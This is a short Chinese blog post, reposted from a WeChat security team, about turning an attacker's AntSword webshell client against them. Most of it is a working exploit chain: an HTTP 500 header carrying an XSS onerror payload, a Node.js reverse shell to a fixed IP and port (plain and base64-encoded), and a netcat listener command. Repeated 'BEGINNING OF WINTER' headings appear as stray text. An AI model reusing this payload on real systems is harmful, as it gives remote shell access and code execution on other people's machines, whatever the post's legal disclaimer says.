目标
BEGINNING OF WINTER
蓝队通过修改后门的代码实现获得蚁剑使用者的权限
环境
BEGINNING OF WINTER
红方:Windows Antsword 蓝方:Linux Web
复现
BEGINNING OF WINTER
原理:
<?phpheader('HTTP/1.1 500 <img src=# onerror=alert(1)>');
Nodejs代码:
var net = require("net"), sh = require("child_process").exec("cmd.exe");var client = new net.Socket();client.connect(5566, "192.168.220.163", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
编码组合后:
<?phpheader("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg1NTY2LCAiMTkyLjE2OC4yMjAuMTYzIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw==`,`base64`).toString())'>");
将上述页面放于红队的一句话木马中。等待红队连接。
kali监听
└─# nc -lvvp 5566模拟红队操作
蓝队kali成功接收到反弹shell
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):溯源反制-获取蚁剑Antsword使用者的权限
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论